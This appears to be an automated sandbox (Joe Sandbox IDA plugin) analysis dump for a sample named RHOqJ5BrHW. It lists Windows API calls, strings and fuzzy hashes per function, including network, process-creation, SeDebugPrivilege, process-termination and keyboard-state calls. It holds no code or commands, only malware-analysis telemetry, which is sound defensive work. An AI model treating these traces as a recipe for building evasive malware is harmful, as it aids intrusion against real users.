                                    • Instruction Fuzzy Hash: 459128706002068FC715FF64C895B68F3A8BF45B04F5582A9E50AA7262DF30AE66CF50
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 0099CC15
                                      • Part of subcall function 0099CCCD: GetClientRect.USER32(?,?), ref: 0099CCF6
                                      • Part of subcall function 0099CCCD: GetWindowRect.USER32(?,?), ref: 0099CD37
                                      • Part of subcall function 0099CCCD: ScreenToClient.USER32(?,?), ref: 0099CD5F
                                    • GetDC.USER32 ref: 009FD137
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009FD14A
                                    • SelectObject.GDI32(00000000,00000000), ref: 009FD158
                                    • SelectObject.GDI32(00000000,00000000), ref: 009FD16D
                                    • ReleaseDC.USER32(?,00000000), ref: 009FD175
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009FD200
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    • Opcode ID: fc7445ab49010d429d9c4574c8ae1a7aa85888f329fa27e8b7a55065cc91395f
                                    • Instruction ID: 391d3b282430c7c6b06b9d1e180bedce5b3973970f722678528c14f28f12b17a
                                    • Opcode Fuzzy Hash: fc7445ab49010d429d9c4574c8ae1a7aa85888f329fa27e8b7a55065cc91395f
                                    • Instruction Fuzzy Hash: 2A710274501208DFCF25DFA8CC81ABA7BBAFF88310F184669EE55562A6D7318882DF50
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009D45FF
                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009D462B
                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 009D466D
                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009D4682
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009D468F
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009D46BF
                                    • InternetCloseHandle.WININET(00000000), ref: 009D4706
                                      • Part of subcall function 009D5052: GetLastError.KERNEL32(?,?,009D43CC,00000000,00000000,00000001), ref: 009D5067
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                    • String ID:
                                    • API String ID: 1241431887-3916222277
                                    • Opcode ID: f641c163ab85018aeaec03c2146b4c6debfb0444e217966b4780881d525ae724
                                    • Instruction ID: e2891cc45df490610b0647c91deaaf8bc300164b8c2479e5b0071297785a4aa5
                                    • Opcode Fuzzy Hash: f641c163ab85018aeaec03c2146b4c6debfb0444e217966b4780881d525ae724
                                    • Instruction Fuzzy Hash: CB416FB2541209BFEB119F90CC89FBB77ACFF09354F008126FA069A281D7B4D9458BA4
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A1DC00), ref: 009DB715
                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A1DC00), ref: 009DB749
                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009DB8C1
                                    • SysFreeString.OLEAUT32(?), ref: 009DB8EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                    • String ID:
                                    • API String ID: 560350794-0
                                    • Opcode ID: 04e6242384b4af63a5f5ccc16cf802fc7198b695c9d1a0df5cf27eb41d960ea8
                                    • Instruction ID: 8809625c8f6f6b4a5e093478b9ae84f24956dd6b389b60c9db60ae3c75818566
                                    • Opcode Fuzzy Hash: 04e6242384b4af63a5f5ccc16cf802fc7198b695c9d1a0df5cf27eb41d960ea8
                                    • Instruction Fuzzy Hash: E1F13C75A00209EFCF04DF94C894EAEB7B9FF89315F118499F905AB250DB31AE46CB90
                                    APIs
                                    • _memset.LIBCMT ref: 009E24F5
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009E2688
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009E26AC
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009E26EC
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009E270E
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009E286F
                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009E28A1
                                    • CloseHandle.KERNEL32(?), ref: 009E28D0
                                    • CloseHandle.KERNEL32(?), ref: 009E2947
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                    • String ID:
                                    • API String ID: 4090791747-0
                                    • Opcode ID: 2cf6141cd0581a8a5069a75890e694501bf8d3fd65f5661dd5cc64a5117a8b4b
                                    • Instruction ID: ac3756fe49dded4a4752c0b0236010fca51c6f6556a1f46eec7fa6de55a5097a
                                    • Opcode Fuzzy Hash: 2cf6141cd0581a8a5069a75890e694501bf8d3fd65f5661dd5cc64a5117a8b4b
                                    • Instruction Fuzzy Hash: F3D1AE31604241DFCB15EF25C891B6ABBE9BF84310F18895DF8999B3A2DB31EC41CB52
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009EB3F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: 3998e43566ce71239e2aae4b10148c91ffbaa94c233aea7bd477bf878380547a
                                    • Instruction ID: b9b9cc20fd86077c64c1ef6099c25b76cf75b42953c50c91d5d7c4bf33946e48
                                    • Opcode Fuzzy Hash: 3998e43566ce71239e2aae4b10148c91ffbaa94c233aea7bd477bf878380547a
                                    • Instruction Fuzzy Hash: 3B51D631601288BFEF229F6ACC86BAF7B68EB45314F244411F614D61E2DB75ED50CB50
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 009FDB1B
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009FDB3C
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009FDB51
                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 009FDB6E
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009FDB95
                                    • DestroyCursor.USER32(00000000), ref: 009FDBA0
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009FDBBD
                                    • DestroyCursor.USER32(00000000), ref: 009FDBC8
                                    Similarity
                                    • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                    • String ID:
                                    • API String ID: 3992029641-0
                                    APIs
                                      • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009C5FA6,?), ref: 009C6ED8
                                      • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009C5FA6,?), ref: 009C6EF1
                                      • Part of subcall function 009C72CB: GetFileAttributesW.KERNEL32(?,009C6019), ref: 009C72CC
                                    • lstrcmpiW.KERNEL32(?,?), ref: 009C75CA
                                    • _wcscmp.LIBCMT ref: 009C75E2
                                    • MoveFileW.KERNEL32(?,?), ref: 009C75FB
                                    Similarity
                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                    • String ID:
                                    • API String ID: 793581249-0
                                    APIs
                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 0099EAEB
                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 0099EB32
                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 009FDC86
                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 009FDCF2
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,009BAEF1,00000B00,?,?), ref: 009BB26C
                                    • RtlAllocateHeap.KERNEL32(00000000,?,009BAEF1,00000B00,?,?), ref: 009BB273
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009BAEF1,00000B00,?,?), ref: 009BB288
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,009BAEF1,00000B00,?,?), ref: 009BB290
                                    • DuplicateHandle.KERNEL32(00000000,?,009BAEF1,00000B00,?,?), ref: 009BB293
                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,009BAEF1,00000B00,?,?), ref: 009BB2A3
                                    • GetCurrentProcess.KERNEL32(009BAEF1,00000000,?,009BAEF1,00000B00,?,?), ref: 009BB2AB
                                    • DuplicateHandle.KERNEL32(00000000,?,009BAEF1,00000B00,?,?), ref: 009BB2AE
                                    • CreateThread.KERNEL32(00000000,00000000,009BB2D4,00000000,00000000,00000000), ref: 009BB2C8
                                    Similarity
                                    • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                    • String ID:
                                    • API String ID: 1422014791-0
                                    Similarity
                                    • API ID:
                                    • String ID: NULL Pointer assignment$Not an Object type
                                    • API String ID: 0-572801152
                                    Similarity
                                    • API ID: Variant$ClearInit$_memset
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                    • API String ID: 2862541840-625585964
                                    Similarity
                                    • API ID: _memset
                                    • String ID: Q\E$[$\$\$]$^
                                    • API String ID: 2102423945-1026548749
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009E9B19
                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 009E9B2D
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009E9B47
                                    • _wcscat.LIBCMT ref: 009E9BA2
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 009E9BB9
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009E9BE7
                                    Similarity
                                    • API ID: MessageSend$Window_wcscat
                                    • String ID: SysListView32
                                    • API String ID: 307300125-78025650
                                    APIs
                                      • Part of subcall function 009C6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009C6554
                                      • Part of subcall function 009C6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 009C6564
                                      • Part of subcall function 009C6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 009C65F9
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009E179A
                                    • GetLastError.KERNEL32 ref: 009E17AD
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009E17D9
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 009E1855
                                    • GetLastError.KERNEL32(00000000), ref: 009E1860
                                    • CloseHandle.KERNEL32(00000000), ref: 009E1895
                                    Similarity
                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 2533919879-2896544425
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 009C58B8
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: blank$info$question$stop$warning
                                    • API String ID: 2457776203-404129466
                                    APIs
                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 009CA806
                                    Similarity
                                    • API ID: ArraySafeVartype
                                    • String ID:
                                    • API String ID: 1725837607-0
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009C6B63
                                    • LoadStringW.USER32(00000000), ref: 009C6B6A
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009C6B80
                                    • LoadStringW.USER32(00000000), ref: 009C6B87
                                    • _wprintf.LIBCMT ref: 009C6BAD
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009C6BCB
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 009C6BA8
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message_wprintf
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 3648134473-3128320259
                                    APIs
                                      • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E2BF6
                                    Similarity
                                    • API ID: BuffCharConnectRegistryUpper
                                    • String ID:
                                    • API String ID: 2595220575-0
                                    APIs
                                    • select.WSOCK32 ref: 009D9691
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D969E
                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 009D96C8
                                    • 733F1EB0.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009D96E9
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D96F8
                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 009D97AA
                                    • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00A1DC00), ref: 009D9765
                                      • Part of subcall function 009BD2FF: _strlen.LIBCMT ref: 009BD309
                                    • _strlen.LIBCMT ref: 009D9800
                                    Similarity
                                    • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                    • String ID:
                                    • API String ID: 3480843537-0
                                    • Opcode ID: 4c7c3a62ffeb5c084ab20426e9e7343af2d97b06b1a038f9274ad887e711ff99
                                    • Instruction ID: 01164fae0ee1afd8abdf630a12cf06eade05cd14a78223aba733d1433a6c3057
                                    • Opcode Fuzzy Hash: 4c7c3a62ffeb5c084ab20426e9e7343af2d97b06b1a038f9274ad887e711ff99
                                    • Instruction Fuzzy Hash: AD819B72504240ABC714EFA4CC85F6BBBA9EFC5714F108A1EF5559B291EB30D905CBA2
                                    APIs
                                    • __mtinitlocknum.LIBCMT ref: 009AA991
                                      • Part of subcall function 009A7D7C: __FF_MSGBANNER.LIBCMT ref: 009A7D91
                                      • Part of subcall function 009A7D7C: __NMSG_WRITE.LIBCMT ref: 009A7D98
                                      • Part of subcall function 009A7D7C: __malloc_crt.LIBCMT ref: 009A7DB8
                                    • __lock.LIBCMT ref: 009AA9A4
                                    • __lock.LIBCMT ref: 009AA9F0
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00A36DE0,00000018,009B5E7B,?,00000000,00000109), ref: 009AAA0C
                                    • RtlEnterCriticalSection.KERNEL32(8000000C,00A36DE0,00000018,009B5E7B,?,00000000,00000109), ref: 009AAA29
                                    • RtlLeaveCriticalSection.KERNEL32(8000000C), ref: 009AAA39
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                    • String ID:
                                    • API String ID: 1422805418-0
                                    • Opcode ID: ac12bf02c9cb443b36ed15568a66fc2cf23a1c8516390bb781ee613f9e1c5eb2
                                    • Instruction ID: d7ee2861e1e5154355baaf1c7515f396b10b5283edd35cbf7b96a71b19dc32f7
                                    • Opcode Fuzzy Hash: ac12bf02c9cb443b36ed15568a66fc2cf23a1c8516390bb781ee613f9e1c5eb2
                                    • Instruction Fuzzy Hash: 33416775A007069BEB10CFA8CA4579CB7F5AF83334F248318E525AB2D2D7749802CBD2
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 009E8EE4
                                    • GetDC.USER32(00000000), ref: 009E8EEC
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009E8EF7
                                    • ReleaseDC.USER32(00000000,00000000), ref: 009E8F03
                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 009E8F3F
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009E8F50
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,009EBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 009E8F8A
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009E8FAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    • Opcode ID: 8c7285741158bad4abd38aaadd8cf32d4ab719fa5542e66db81a8f55180a75c8
                                    • Instruction ID: 514649884d9c020b17ca4c8c35eab011a5939eebea58e2c5c21904e7f8a5f0b0
                                    • Opcode Fuzzy Hash: 8c7285741158bad4abd38aaadd8cf32d4ab719fa5542e66db81a8f55180a75c8
                                    • Instruction Fuzzy Hash: C4315C72100254BFEB118F95CC89FAB3BAEEB49715F044065FE099A191CA759C42CBB0
                                    APIs
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                      • Part of subcall function 0099C6F4: _wcscpy.LIBCMT ref: 0099C717
                                    • _wcstok.LIBCMT ref: 009D184E
                                    • _wcscpy.LIBCMT ref: 009D18DD
                                    • _memset.LIBCMT ref: 009D1910
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                    • String ID: X
                                    • API String ID: 774024439-3081909835
                                    • Opcode ID: 49902d90d15b051a31b04c521b81185c477ec7d6c073c922d2c86475e7b69985
                                    • Instruction ID: b13eaa7cc2f58a7e1ec38334f2c466f56ab6964dd97be3b5ffd6afcc9c800629
                                    • Opcode Fuzzy Hash: 49902d90d15b051a31b04c521b81185c477ec7d6c073c922d2c86475e7b69985
                                    • Instruction Fuzzy Hash: 80C18075608341AFC714EF64C995B5AB7E4BF85350F00892EF89A973A2DB30ED05CB82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b99bb406217b1b8acdf07ab84696fe54608f8400ed798d35355067fd1a2f8e5a
                                    • Instruction ID: fb40b33c2f44e7bee82ca482c185e9a4407dbe1fd273423b65f0e8f5f29baa54
                                    • Opcode Fuzzy Hash: b99bb406217b1b8acdf07ab84696fe54608f8400ed798d35355067fd1a2f8e5a
                                    • Instruction Fuzzy Hash: 21716CB1900109EFDF14CF98CC89ABEBB78FF85314F248149F915AA251C734AA52CFA5
                                    APIs
                                    • _memset.LIBCMT ref: 009E225A
                                    • _memset.LIBCMT ref: 009E2323
                                    • ShellExecuteExW.SHELL32(?), ref: 009E2368
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                      • Part of subcall function 0099C6F4: _wcscpy.LIBCMT ref: 0099C717
                                    • CloseHandle.KERNEL32(00000000), ref: 009E242F
                                    • FreeLibrary.KERNEL32(00000000), ref: 009E243E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                    • String ID: @
                                    • API String ID: 4082843840-2766056989
                                    • Opcode ID: 2f088404bbc35827bfca684a1eb9661d52a9504718b2dfbab63d8e56f55c3d34
                                    • Instruction ID: eb2c61d75905d697c4d717d560f5b826b038a32cfe5a6f355d07a8a97b9ca796
                                    • Opcode Fuzzy Hash: 2f088404bbc35827bfca684a1eb9661d52a9504718b2dfbab63d8e56f55c3d34
                                    • Instruction Fuzzy Hash: E3716F719006599FCF05EFA9C881AAEB7F9FF88310F108459E855AB391DB34AD41CF90
                                    APIs
                                    • GetParent.USER32(00000000), ref: 009C3C02
                                    • GetKeyboardState.USER32(?), ref: 009C3C17
                                    • SetKeyboardState.USER32(?), ref: 009C3C78
                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009C3CA4
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009C3CC1
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009C3D05
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009C3D26
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: ca0403bcf45d9c5f96c2104b719a34a9bbf989b03d3ee58292e2d9d84bd3e649
                                    • Instruction ID: 85978164d5f79c51bd044118231c4e1752b319a5ccd919f7eeb0220f5dd225f8
                                    • Opcode Fuzzy Hash: ca0403bcf45d9c5f96c2104b719a34a9bbf989b03d3ee58292e2d9d84bd3e649
                                    • Instruction Fuzzy Hash: B151F6A1E487D53DFB3283648C55FBABE9D6B06300F0CC48CE4D6568C2D695EE84D762
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
